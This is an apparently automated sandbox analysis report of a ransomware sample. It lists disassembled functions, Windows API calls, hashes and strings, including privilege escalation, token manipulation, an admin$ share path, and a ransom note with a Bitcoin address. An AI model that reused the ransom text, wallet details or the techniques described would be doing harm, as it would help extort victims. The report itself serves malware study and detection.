                                                • recv.WS2_32(00000000,00000000,00000000,00000000), ref: 02E5681D
                                                • htons.WS2_32(?), ref: 02E56832
                                                • recv.WS2_32(00000000,?,?,00000000), ref: 02E5686A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv$htonsmemsetselect
                                                • String ID:
                                                • API String ID: 2017298870-0
                                                • Opcode ID: ddc9edf0e861f0354a1f9f78d2370c2601ba975897c9500b82783fd55b80db55
                                                • Instruction ID: 9fa9f9cce9abf078dd7418fc231bfb28272f3a8f342734c263a0bd5e50441737
                                                • Opcode Fuzzy Hash: ddc9edf0e861f0354a1f9f78d2370c2601ba975897c9500b82783fd55b80db55
                                                • Instruction Fuzzy Hash: B5210275590224ABCB248F69CC48BFE7BB9EF94308F50895AF885CB190E7788990CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51424 Relevance: 7.6, APIs: 5, Instructions: 51encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,00000000,00000000,000001FF,?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E5143D
                                                • GetLastError.KERNEL32(?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E51457
                                                • CryptGenRandom.ADVAPI32(00000000,00000000,?,?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E51473
                                                • GetLastError.KERNEL32(?,?,02E515BA,00000000,0000003C,00000000,?,00000000), ref: 02E5147D
                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,00000000,0000003C,00000000,?), ref: 02E5149A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$ContextErrorLast$AcquireRandomRelease
                                                • String ID:
                                                • API String ID: 236824231-0
                                                • Opcode ID: fb2b4e7e91d9624a6a70427709c947020e242b61729c6d7674040ca1df92fac5
                                                • Instruction ID: 804a7202b35a72a056268dfe788e5ac7ba700ece010997a3a0c0c6846ad26f23
                                                • Opcode Fuzzy Hash: fb2b4e7e91d9624a6a70427709c947020e242b61729c6d7674040ca1df92fac5
                                                • Instruction Fuzzy Hash: 49017575AA0326BFDB109BA6DD45B9B3BA9EF04398F60A461FA05D6100D730C9509750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5A5CC Relevance: 1.9, APIs: 1, Instructions: 675COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8eb6e04be073383a7848f727263850b8b71c3d24ade767951a895af7bf953f24
                                                • Instruction ID: 0a24d39b9eeb0c6892f3872a906859be530691a7f6293dfc3b1f09b393d98128
                                                • Opcode Fuzzy Hash: 8eb6e04be073383a7848f727263850b8b71c3d24ade767951a895af7bf953f24
                                                • Instruction Fuzzy Hash: 87424970A506249FDF18CF59C8946AEBBF2BF88308F14D6A9EC159B349D774DA40CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E52466 Relevance: 1.5, APIs: 1, Instructions: 33networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E51000: GetProcessHeap.KERNEL32(00000008,0000FEFF,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E51008
                                                  • Part of subcall function 02E51000: HeapAlloc.KERNEL32(00000000,?,02E5271B,00000062,0000FEFF,?,02CE5020,000001BD), ref: 02E5100F
                                                • htons.WS2_32(-000000FC), ref: 02E5247E
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocProcesshtons
                                                • String ID:
                                                • API String ID: 1354327697-0
                                                • Opcode ID: c64c2fc2f62054c7999bc198966c55c7cf73a0cd7410818a80a623e44e35809b
                                                • Instruction ID: efb050f9df5bad538641405c794cb68e8068136a32dcca18559f89cc45fadc11
                                                • Opcode Fuzzy Hash: c64c2fc2f62054c7999bc198966c55c7cf73a0cd7410818a80a623e44e35809b
                                                • Instruction Fuzzy Hash: 7C011D2C050B969AC7209FA4C4006D7BBB0EF19750B009A0EFDADD7B51E330D955CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E522A2 Relevance: 1.4, Strings: 1, Instructions: 134COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: -
                                                • API String ID: 0-2547889144
                                                • Opcode ID: 264c4a9f84c94ddb469add652ad46e45e4ab2030dd98d8d844247b2185d83b53
                                                • Instruction ID: 48991b29c157c9cc5bdbcc7bf725039cda8228e42023b7833d61bc74b74dc00f
                                                • Opcode Fuzzy Hash: 264c4a9f84c94ddb469add652ad46e45e4ab2030dd98d8d844247b2185d83b53
                                                • Instruction Fuzzy Hash: 8A4138368A827147DB2CCA59C0407BEB6A36FDC30CF59E1BACE0A1B245DB714987C295
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5AEAD Relevance: .8, Instructions: 826COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3261ce101a4ddf80537a8d77e909f4128732bfcff0c3432a6bd02ab708136fc5
                                                • Instruction ID: b2f5598549fe5cb3f9d090cd6682a4bac118082f421e54042dac652df2746dd1
                                                • Opcode Fuzzy Hash: 3261ce101a4ddf80537a8d77e909f4128732bfcff0c3432a6bd02ab708136fc5
                                                • Instruction Fuzzy Hash: 21625B71E506249FCF18CF59C8906ADBBF2FF84318B1491AEDC56AB389D7749A40CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5BF73 Relevance: .2, Instructions: 200COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e2134b6c4d94fc1a920cb20b85918491cebd6ce19787d368ec8a3bedd81c72a0
                                                • Instruction ID: 1ae259945d1d5ba69b2740514a195bae063592c1c5e443cc346fd8c40f37ec72
                                                • Opcode Fuzzy Hash: e2134b6c4d94fc1a920cb20b85918491cebd6ce19787d368ec8a3bedd81c72a0
                                                • Instruction Fuzzy Hash: 09719571BF06694BD72CCE1FECD05367362E78D30078A8E79DA0687746C635A671CAA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E53CA0 Relevance: .1, Instructions: 85COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CountTick
                                                • String ID:
                                                • API String ID: 536389180-0
                                                • Opcode ID: 7264c2d340a83b43ce87e55edd08f45daa51ce9748ef29fb57478e23bd97aa35
                                                • Instruction ID: e88e521fe0a8a15cf569d9f19e6efd361f028518fba2d3ef884f7a4fdeac32b0
                                                • Opcode Fuzzy Hash: 7264c2d340a83b43ce87e55edd08f45daa51ce9748ef29fb57478e23bd97aa35
                                                • Instruction Fuzzy Hash: FC312330AA1BA4AEEB21DF38C4047DBBBF5AF06354F10DA5DE9E99B381C33155408B94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51D32 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 105filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 02E51BA0: CryptStringToBinaryW.CRYPT32(89FF33FF,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BC6
                                                  • Part of subcall function 02E51BA0: LocalAlloc.KERNEL32(00000040,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,?,?,02E51D43,?), ref: 02E51BD6
                                                  • Part of subcall function 02E51BA0: CryptStringToBinaryW.CRYPT32(MIIBCgKCAQEAxP/VqKc0yLe9JhVqFMQGwUITO6WpXWnKSNQAYT0O65Cr8PjIQInTeHkXEjfO2n2JmURWV/uHB0ZrlQ/wcYJBwLhQ9EqJ3iDqmN19Oo7NtyEUmbYmopcq+Y,00000000,00000001,00000000,?,00000000,00000000), ref: 02E51BF8
                                                  • Part of subcall function 02E51BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,00000000,?,00000000,00000000,00000000,02E51D43), ref: 02E51C1A
                                                  • Part of subcall function 02E51BA0: LocalAlloc.KERNEL32(00000040,02E51D43,?,?,?,02E51D43,?), ref: 02E51C25
                                                  • Part of subcall function 02E51BA0: CryptDecodeObjectEx.CRYPT32(00010001,00000013,?,?,00000000,00000000,00000000,02E51D43), ref: 02E51C42
                                                  • Part of subcall function 02E51BA0: CryptImportKey.ADVAPI32(5708458B,?,02E51D43,00000000,00000000,02E51D4F,?,?,?,02E51D43,?), ref: 02E51C5A
                                                  • Part of subcall function 02E51BA0: LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C66
                                                  • Part of subcall function 02E51BA0: LocalFree.KERNEL32(?,?,?,?,02E51D43,?), ref: 02E51C6F
                                                  • Part of subcall function 02E51C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,F0000000,?,Microsoft Enhanced RSA and AES Cryptographic Provider,?,02E51D54,F0000000,?), ref: 02E51CA6
                                                  • Part of subcall function 02E51C7F: LocalAlloc.KERNEL32(00000040,?,?,02E51D54,F0000000,?), ref: 02E51CB1
                                                  • Part of subcall function 02E51C7F: CryptExportKey.ADVAPI32(?,?,00000001,00000000,00000000,?,?,02E51D54,F0000000,?), ref: 02E51CCC
                                                  • Part of subcall function 02E51C7F: CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51CE8
                                                  • Part of subcall function 02E51C7F: LocalAlloc.KERNEL32(00000040,F0000000,?,02E51D54,F0000000,?), ref: 02E51CF6
                                                  • Part of subcall function 02E51C7F: CryptBinaryToStringW.CRYPT32(02E51D54,?,00000001,00000000,F0000000), ref: 02E51D0F
                                                  • Part of subcall function 02E51C7F: LocalFree.KERNEL32(02E51D54,?,02E51D54,F0000000,?), ref: 02E51D24
                                                • PathCombineW.SHLWAPI(?,?,README.TXT,F0000000,?), ref: 02E51D70
                                                • LocalFree.KERNEL32(?), ref: 02E51E46
                                                  • Part of subcall function 02E56973: GetTickCount.KERNEL32 ref: 02E56973
                                                • Sleep.KERNEL32(-00000001), ref: 02E51D8F
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 02E51DA8
                                                • WriteFile.KERNEL32(00000000,Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b,00000432,?,00000000,?), ref: 02E51DD3
                                                • WriteFile.KERNEL32(00000000,1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX,0000004C,?,00000000), ref: 02E51DE2
                                                • WriteFile.KERNEL32(00000000,2.Send your Bitcoin wallet ID and personal installation key to e-mail ,0000008E,?,00000000), ref: 02E51DF4
                                                • WriteFile.KERNEL32(00000000,flinfarcconbio1975,00000038,?,00000000), ref: 02E51E03
                                                • WriteFile.KERNEL32(00000000,Your personal installation key:,00000048,?,00000000), ref: 02E51E12
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 02E51E35
                                                • CloseHandle.KERNEL32(00000000), ref: 02E51E38
                                                Strings
                                                • 2.Send your Bitcoin wallet ID and personal installation key to e-mail , xrefs: 02E51DEE
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51D95
                                                • Your personal installation key:, xrefs: 02E51E0C
                                                • flinfarcconbio1975, xrefs: 02E51DFD
                                                • README.TXT, xrefs: 02E51D61
                                                • Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b, xrefs: 02E51DCA
                                                • 1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX, xrefs: 02E51DDC
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Local$File$Write$AllocBinaryFreeString$DecodeExportObject$CloseCombineCountCreateHandleImportPathSleepTick
                                                • String ID: Your personal installation key:$1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX$2.Send your Bitcoin wallet ID and personal installation key to e-mail $Microsoft Enhanced RSA and AES Cryptographic Provider$Ooops, your important files are encrypted.If you see this text, then your files are no longer accessible, becausethey have b$README.TXT$flinfarcconbio1975
                                                • API String ID: 3272514228-3166512299
                                                • Opcode ID: 3a0337d54de25562f6d28d2804fe48e8e4a8fdc202a88658abf323bbdb20cd78
                                                • Instruction ID: 216739bb48c4afb7d895d130fe063ec5e6ab67fc5571f822e796e8bccd41eea5
                                                • Opcode Fuzzy Hash: 3a0337d54de25562f6d28d2804fe48e8e4a8fdc202a88658abf323bbdb20cd78
                                                • Instruction Fuzzy Hash: F63108759D0228BAEB209BA5CC49EEF7FBDEB89740F009455B905E6041DBB0DA40CB70
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5875A Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 147processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 02E5878C
                                                  • Part of subcall function 02E58494: memset.MSVCRT ref: 02E584AD
                                                  • Part of subcall function 02E58494: GetVersionExW.KERNEL32(?,?,?,00000000), ref: 02E584C6
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02E587A4
                                                • Process32FirstW.KERNEL32 ref: 02E587C5
                                                • OpenProcess.KERNEL32(00000450,00000000,0000022C), ref: 02E587FF
                                                • OpenProcessToken.ADVAPI32(00000000,02000000,?), ref: 02E58818
                                                • GetTokenInformation.ADVAPI32(000000FF,0000000C(TokenIntegrityLevel),?,00000004,?), ref: 02E5883E
                                                • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000002,00000002,?), ref: 02E58867
                                                • memset.MSVCRT ref: 02E5887D
                                                • GetTokenInformation.ADVAPI32(?,0000000A(TokenIntegrityLevel),?,00000038,?,?,00000000,?), ref: 02E58897
                                                • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,00000000,?), ref: 02E588C6
                                                • CloseHandle.KERNEL32(?), ref: 02E58901
                                                • CloseHandle.KERNEL32(?), ref: 02E58907
                                                • Process32NextW.KERNEL32(?,?), ref: 02E58919
                                                • GetLastError.KERNEL32 ref: 02E58929
                                                • CloseHandle.KERNEL32(?), ref: 02E58933
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Token$CloseHandleInformationmemset$OpenProcessProcess32$CreateDuplicateErrorFirstLastNextSnapshotToolhelp32Version
                                                • String ID: @
                                                • API String ID: 4137997400-2766056989
                                                • Opcode ID: b31adf649323a0fd3e0a72ce0c7d1c3def22c6910132095ebab85d24b38a8ac0
                                                • Instruction ID: 501541ed7258788a01c8a83f1be652f3e6b639a311782e700d154dd7b2af130c
                                                • Opcode Fuzzy Hash: b31adf649323a0fd3e0a72ce0c7d1c3def22c6910132095ebab85d24b38a8ac0
                                                • Instruction Fuzzy Hash: 15515B71598361AFE320DF25CC48A6BBBE8FF88758F445A2DF994D2190D730C985CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57CC0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 96memoryfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 02E57CCB
                                                  • Part of subcall function 02E581BA: GetCurrentProcess.KERNEL32(00000028,?,?,00000000), ref: 02E581DE
                                                  • Part of subcall function 02E581BA: OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 02E581E5
                                                  • Part of subcall function 02E581BA: LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 02E581F7
                                                  • Part of subcall function 02E581BA: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 02E5821A
                                                  • Part of subcall function 02E581BA: GetLastError.KERNEL32(?,00000000), ref: 02E58222
                                                  • Part of subcall function 02E581BA: SetLastError.KERNEL32(?,?,00000000), ref: 02E58234
                                                • GetModuleFileNameW.KERNEL32(C:\Windows\dllcm.dat,0000030C,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,02E57E00), ref: 02E57D27
                                                • CreateFileW.KERNEL32(C:\Windows\dllcm.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02E58AEC
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 02E58AFD
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B0C
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E58B13
                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02E58B2C
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02E58B3D
                                                • HeapFree.KERNEL32(00000000), ref: 02E58B44
                                                • CloseHandle.KERNEL32(?), ref: 02E58B63
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileHeapProcess$ErrorLastToken$AdjustAllocCloseCountCreateCurrentFreeHandleLookupModuleNameOpenPrivilegePrivilegesReadSizeTickValue
                                                • String ID: C:\Windows\dllcm.dat$SeDebugPrivilege$SeShutdownPrivilege$SeTcbPrivilege
                                                • API String ID: 3788613323-3655906534
                                                • Opcode ID: aabb8b93dbbdbbbae31252b7e23d93605cc3c7fc63707e5a3b2f61ff21937eea
                                                • Instruction ID: b881973bd2129d80ebf06862d8ba564335eae8c60fc9b9c0a2ad9143f34fac43
                                                • Opcode Fuzzy Hash: aabb8b93dbbdbbbae31252b7e23d93605cc3c7fc63707e5a3b2f61ff21937eea
                                                • Instruction Fuzzy Hash: 80319370DE0334ABDB21AB66AD4DEAB7F6DAB49795B40A815FC02E2141D77045D0CBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58BC6 Relevance: 19.6, APIs: 13, Instructions: 91threadmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentThread.KERNEL32 ref: 02E58BE0
                                                • OpenThreadToken.ADVAPI32(00000000), ref: 02E58BE7
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 02E58C09
                                                • GetLastError.KERNEL32 ref: 02E58C1A
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 02E58C2B
                                                • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 02E58C44
                                                • GetSidSubAuthorityCount.ADVAPI32(00000004), ref: 02E58C5B
                                                • GetSidSubAuthority.ADVAPI32(00000004,00000004), ref: 02E58C6E
                                                • GetLastError.KERNEL32 ref: 02E58C99
                                                • GlobalFree.KERNEL32(00000000), ref: 02E58C9C
                                                • GetLastError.KERNEL32 ref: 02E58CA4
                                                • CloseHandle.KERNEL32(?), ref: 02E58CAB
                                                • GetLastError.KERNEL32 ref: 02E58CB3
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$Token$AuthorityGlobalInformationThread$AllocCloseCountCurrentFreeHandleOpen
                                                • String ID:
                                                • API String ID: 1283781744-0
                                                • Opcode ID: f1398fb25f2f9ede8d18e4140e47865d8af48e3a85d23ff0fceffc2e8e20e1e0
                                                • Instruction ID: c9dacd392abb39ded89d88ac17bbc6a7b9c8ca3655afda440514742e2641fb51
                                                • Opcode Fuzzy Hash: f1398fb25f2f9ede8d18e4140e47865d8af48e3a85d23ff0fceffc2e8e20e1e0
                                                • Instruction Fuzzy Hash: 08318935DE2234EBEB20DBA2DD88BEE7B79EF04708F509450EA00A2050C73199D1CB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E56CE7 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 96memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000,?,?,?), ref: 02E56D1D
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56D26
                                                • memcpy.MSVCRT ref: 02E56D53
                                                • GetProcessHeap.KERNEL32(00000008,?,\\%ws\admin$\%ws), ref: 02E56D78
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E56D7B
                                                • memcpy.MSVCRT ref: 02E56DAA
